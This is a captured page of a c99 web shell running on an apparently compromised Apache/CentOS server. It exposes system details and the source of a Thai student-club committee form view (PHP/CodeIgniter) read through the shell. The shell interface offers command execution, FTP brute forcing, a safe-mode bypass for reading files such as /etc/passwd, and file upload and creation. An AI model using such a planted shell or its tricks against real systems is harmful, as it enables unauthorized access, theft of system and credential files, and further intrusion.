!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/esa/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_smo_pos.php (6.49 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<link rel="stylesheet" href="<?=base_url();?>libraries/fcbkcomplete/fcbkcomplete.css" type="text/css"  charset="utf-8" />
<script src="<?=base_url();?>libraries/fcbkcomplete/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="<?=base_url();?>libraries/fcbkcomplete/fcbkcomplete.min.js" type="text/javascript" charset="utf-8"></script>
<script src="<?=base_url();?>libraries/fcbkcomplete/fcbkcomplete.js" type="text/javascript" charset="utf-8"></script>
<script type="text/javascript">
    function getAcY(){
        // fcbkcomplete
        var list_url = "<?=site_url('esa/search/get_std_json');?>";
        $('.holder').remove(); // ตั้งค่า mb_year ใหม่เมื่อมีการเปลี่ยนแปลง
        $.facebooklist('#std_id', '#preadded', '#facebook-auto',{url:list_url,cache:1}, 10, {userfilter:1,casesensetive:0});
    }
    $(document).ready(function() {

        // call fcbkcomplete
        getAcY();
    });


function findByYear(){
    jQuery("#myform").attr("action","<?=site_url($this->config->item('sa_folder')).'/smo_club/smo_pos'?>");
    jQuery("#myform").trigger("submit");
}
</script>
<?php
    $_image_reply 
= array(
                    
'src' => 'images/edit.png',         
                    
'width' => '15',
                    
'height' => '15',
                    
'border' => '0',
                    
'title' => 'แก้ไขข้อมูล',
                    
'onmouseover' => "this.style.cursor='pointer'"
    
);
    
$_image_del = array(
                    
'src' => 'images/delete.png',         
                    
'width' => '15',
                    
'height' => '15',
                    
'border' => '0',
                    
'title' => 'ลบข้อมูล',
                    
'onmouseover' => "this.style.cursor='pointer'"
    
);

//    $cl = $cl_->row();
$row_cmt = ($qu_cmt->num_rows() > 0) ? $qu_cmt->row() : NULL;
?>
<?php 
echo form_open($this->config->item('sa_folder').'smo_club/add_smo_pos', array("name" => "myform""id" => "myform"));?>
<table width="80%" align="center">
    <tr>
        <td align="center"><h3>บันทึก/แก้ไขรายชื่อคณะกรรมการสโมสร</h3></td>
    </tr>
    <tr>
        <th align="center" colspan="2"></th>
    </tr>
    <tr>
        <td>

<table id="table_input" class='szone2' width="100%" border="0">
    <tr >
        <th >ปีการศึกษา </th>
        <td ><?php  
        krsort
($rs_tmc);
        
$js 'id="tmc_year" onChange="findByYear();"';
        echo 
form_dropdown('tmc_year'$rs_tmc$year,$js);  
        
?>
        </td>
    </tr>
    <tr >
        <th >ตำแหน่ง </th>
        <td >
<?php       
            $pos 
= ((isset($error['pos_id']))? $error['pos_id'] : ((set_value('pos_id',getval('cmt_pos_id',$row_cmt))=="")? "":set_value('pos_id',getval('cmt_pos_id',$row_cmt))));
        
            echo 
form_dropdown('pos_id'$rs_pos$pos);    ?>
            <?php echo form_error('pos_id');
            if(isset(
$error['msg'])){
            
?>
                <span class="error"><?=$error['msg']?></span>
            <?}?>
        </td>
    </tr>

        <tr >
            <th align="right">รหัส/ชื่อ-สกุลนักศึกษา</th>
            <td id="facebook-list" class="input-text">
        <span id="facebook_input" style="display:inline-block"> 
                <input type="text" value="" id="std_id" />
                <ul id="preadded" style="display:none">
<?php
                    
if (isset($row_cmt)) {
?>
                    <li value="<?php echo getval('stdId'$row_cmt); ?>"><?php
                    
echo getval('stdCode'$row_cmt).': '.getval('stdName'$row_cmt).' '.getval('stdSurname'$row_cmt);
                    
?></li>
<?php
                    
}
?>
                </ul>
                <div id="facebook-auto" >
                    <div class="default">กรุณากรอกรหัส/ชื่อ-สกุลนักศึกษา</div> 
                    <ul id="feed"></ul>
                </div>
            </span>
        <?php echo form_error('facebook-demo');?>
            </td>
        </tr>

    <tr >
        <th align="right">วันที่แต่งตั้ง</th>
        <?
        $date 
= ((isset($error['cmt_fr_date']))? $error['cmt_fr_date']: (set_value('cmt_fr_date') ? set_value('cmt_fr_date') : splitDateDb2(getval('cmt_fr_date'$row_cmtgetNowDate()), '/')));
        
?>
        <td >
            <script>DateInput('cmt_fr_date', true, 'DD/MM/YYYY', "<?php echo $date;?>");</script>
        </td>
    </tr>
    <tr >
        <td colspan="2" align="center">
        <input type="hidden" name="persons" id="persons" />
        <input type="hidden" name="cmt_id" id="cmt_id" value="<?php echo getval('cmt_id',$row_cmt)?>"/>
        <input type="submit" name="record" value="บันทึก" onclick="javascript:do_submit();"/></td>
    </tr>
</table>

        </td>
    </tr>
</table><br />
<table id="table_show" class='tb_1' width="50%" >
    <tr>
        <th align="center" width="10%">ลำดับที่</th>
        <th align="center" width="15%">ปีการศึกษา</th>
        <th align="center" >ตำแหน่ง</th>
        <th align="center" >ชื่อ</th>
        <th align="center" >วันที่แต่งตั้ง</th>
        <th align="center" width="5%">แก้ไข</th>
        <th align="center" width="5%">ลบ</th>
    </tr>
<?php 
    
if ($rs_cmt->num_rows 0) {
    
$index=1;
    foreach (
$rs_cmt->result() as $row) {
?>
    <tr >
        <td align="center"><?php echo $index;?></td>
        <td align="center"><?php echo $row->cmt_year;?></td>
        <td align="left"><?php echo $row->pos_name;?></td>
        <td align="left"><?php echo $row->stdName.' '.$row->stdSurname;?></td>
        <td align="left"><?php echo fulldate2($row->cmt_fr_date);?></td>
        <td align="center"><span class="hand" onClick="sendPost('myform', {'cmt_id':<?php echo $row->cmt_id;?>}, 'smo_pos')"><?php echo img($this->config->item('sa_image_reply'));?></span></td>
        <td align="center"><?php echo anchor($this->config->item('sa_folder').'smo_club/del_smo_pos/'.$row->cmt_id,img($_image_del),array('onclick'=>"return confirm('ต้องการลบตำแหน่งนี้ใช่หรือไม่');")); ?></td>
    </tr>
<?php 
        $index
++;
    }
} else {
?>
    <tr class="notfound">
        <td colspan="7" >** ไม่พบชื่อตำแหน่ง **</td>
    </tr>
<?php 
}
?>
</table>
<script language="javascript">
function do_submit(){
    tlist1.update(); 
    document.getElementById('persons').value = $F('wk11_co');
    document.myform.submit();
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0099 ]--